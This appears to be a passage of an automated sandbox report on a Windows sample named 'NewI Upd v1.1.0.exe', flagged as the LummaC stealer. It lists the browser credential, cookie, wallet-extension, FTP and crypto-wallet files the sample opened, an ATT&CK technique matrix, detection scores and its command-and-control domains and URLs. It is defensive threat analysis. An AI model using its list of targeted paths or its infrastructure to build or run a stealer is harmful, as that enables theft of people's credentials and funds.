Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents			Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents			Jump to behavior

Source: Yara match	File source: 00000000.00000003.3109623142.000000000196B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NewI Upd v1.1.0.exe PID: 6648, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: NewI Upd v1.1.0.exe PID: 6648, type: MEMORYSTR
Source: Yara match	File source: 0.2.NewI Upd v1.1.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3179555778.00000000017B0000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Deobfuscate/Decode Files or Information	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	12 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	34 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NewI Upd v1.1.0.exe	42%	ReversingLabs	Win32.Trojan.LummaC
NewI Upd v1.1.0.exe	35%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://begguinnerz.biz:443/apis92o4p.default-release/key4.dbPK	0%	Avira URL Cloud	safe
https://begguinnerz.biz/4	0%	Avira URL Cloud	safe
https://begguinnerz.biz/piT	0%	Avira URL Cloud	safe
https://begguinnerz.biz:443/apin.txtPK	0%	Avira URL Cloud	safe
begguinnerz.biz	0%	Avira URL Cloud	safe
https://begguinnerz.biz/	0%	Avira URL Cloud	safe
https://begguinnerz.biz/$	0%	Avira URL Cloud	safe
https://begguinnerz.biz/apiz/	0%	Avira URL Cloud	safe
https://begguinnerz.biz:443/apiOO	0%	Avira URL Cloud	safe
https://begguinnerz.biz/L	0%	Avira URL Cloud	safe
https://begguinnerz.biz/pil	0%	Avira URL Cloud	safe
https://begguinnerz.biz:443/api	0%	Avira URL Cloud	safe
https://begguinnerz.biz/D	0%	Avira URL Cloud	safe
https://begguinnerz.biz/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
begguinnerz.biz	172.67.190.223	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
wordyfindy.lat	false		high
slipperyloo.lat	false		high
curverpluch.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
shapestickyr.lat	false		high
begguinnerz.biz	true	Avira URL Cloud: safe	unknown
talkynicer.lat	false		high
bashfulacid.lat	false		high
https://begguinnerz.biz/api	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz:443/apis92o4p.default-release/key4.dbPK	NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/4	NewI Upd v1.1.0.exe, 00000000.00000002.3179960747.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000198A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
